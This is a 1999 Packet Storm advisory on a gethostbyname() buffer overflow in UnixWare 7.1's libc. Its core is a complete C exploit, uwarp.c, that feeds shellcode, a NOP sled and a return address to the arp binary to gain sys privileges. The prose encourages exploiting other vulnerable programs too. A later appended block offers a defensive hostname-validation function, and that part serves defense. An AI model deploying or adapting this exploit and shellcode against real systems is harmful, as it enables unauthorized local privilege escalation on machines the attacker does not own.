unixware7.gethostbyname.txt

02 Dec 1999 00:00:00 | Reported by Brock Tellier | Type: packetstorm | Source: packetstormsecurity.com

A buffer overflow in gethostbyname() in UnixWare 7.1's libc allows any user to obtain elevated privileges.

Code
`  
  
  
Greetings,  
  
OVERVIEW  
A serious bug exists in UnixWare 7.1's libc. A buffer overflow in  
gethostbyname() will allow any user to obtain elevated privileges.  
  
BACKGROUND  
Is this the same gethostbyname() overflow which was present in ancient   
versions of non-unixware libc's way back when? I can't say for sure, but  
given SCO's record of fixing known holes (remember the OpenServer 5  
Xtlib overflows, still present four years after they were known?), I   
wouldn't doubt it.  
  
DETAILS  
Any program which uses gethostbyname() with user-defined input is  
vulnerable to a buffer overflow attack. These overflows vary in how  
easily they can be exploited. My demonstration program happened to  
be "arp", but any program calling this function will do. When exploiting  
the dozens of programs vulnerable to this hole, don't forget to check  
your /etc/security/tcb/privs file for other non-suid programs which may  
allow you to elevate your privileges as well. See my uidadmin advisory  
for more info on UW7's privilege system.  
  
EXPLOIT  
--- uwarp.c ---  
/**  
** UnixWare 7.1 arp exploit yields gid of sys   
** Demonstrates overflow in uw71's gethostbyname()  
** use offsets of +-100  
** Brock Tellier [email protected]  
**   
**/   
  
  
#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  
#include <unistd.h>  
  
char scoshell[]=   
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"  
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"  
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";  
  
  
#define LEN 3500  
#define NOP 0x90  
  
/* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx  
unsigned long get_sp(void) {  
  
__asm__("movl %esp, %eax");  
  
}  
*/  
  
int main(int argc, char *argv[]) {  
  
long int offset=0;  
  
int i;  
int buflen = LEN;  
long int addr;  
char buf[LEN];  
  
if(argc > 3) {  
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);  
exit(0);   
}  
else if (argc == 2){  
offset=atoi(argv[1]);  
  
}  
else if (argc == 3) {  
offset=atoi(argv[1]);  
buflen=atoi(argv[2]);   
  
}  
else {  
offset=100;  
buflen=3000;  
  
}  
  
  
addr=0x8046b75 + offset;  
  
fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");  
fprintf(stderr, "Brock Tellier [email protected]\n\n");  
fprintf(stderr, "Using addr: 0x%lx\n", addr);  
  
memset(buf,NOP,buflen);  
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));  
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)  
*(int *)&buf[i]=addr;  
  
execl("/usr/sbin/arp", "arp", buf,  
NULL);  
  
exit(0);  
}  
  
------  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
`
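Because the advisory places the flaw in libc, every caller that passes user-controlled input to gethostbyname() inherits it until libc is patched. The block below is an added example, not part of the original advisory: a caller-side guard that rejects anything that is not a syntactically valid host name before the resolver sees it. The helper name `hostname_is_sane` is hypothetical, the limits are the RFC 1035 maxima, and it assumes the overflow needs input longer than a legal host name, which the advisory does not state.

```c
#include <ctype.h>
#include <netdb.h>
#include <stddef.h>
#include <stdio.h>

#define MAX_NAME_LEN  253   /* RFC 1035: longest full name in text form */
#define MAX_LABEL_LEN  63   /* RFC 1035: longest dot-separated label */

/* Hypothetical helper (not from the advisory): returns 1 if `name` may be
 * handed to a resolver call such as gethostbyname(), 0 otherwise. */
int hostname_is_sane(const char *name)
{
    size_t total = 0, label = 0;
    const char *p;

    if (name == NULL || *name == '\0')
        return 0;
    for (p = name; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;

        if (++total > MAX_NAME_LEN)
            return 0;               /* oversized input: stop scanning early */
        if (c == '.') {
            if (label == 0)
                return 0;           /* empty label: leading or doubled dot */
            label = 0;
            continue;
        }
        /* Letters, digits and '-' only, so NOP padding, opcode bytes and
         * path characters never reach the resolver. */
        if (!isalnum(c) && c != '-')
            return 0;
        if (++label > MAX_LABEL_LEN)
            return 0;
    }
    return 1;
}

int main(int argc, char *argv[])
{
    struct hostent *he;

    if (argc != 2 || !hostname_is_sane(argv[1])) {
        fprintf(stderr, "rejected: not a valid host name\n");
        return 1;
    }
    he = gethostbyname(argv[1]);    /* reached only with bounded input */
    printf("%s\n", he ? he->h_name : "lookup failed");
    return 0;
}
```

The check is deliberately strict (underscores and non-ASCII names are refused); it limits exposure in one caller and does not replace a fixed libc.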
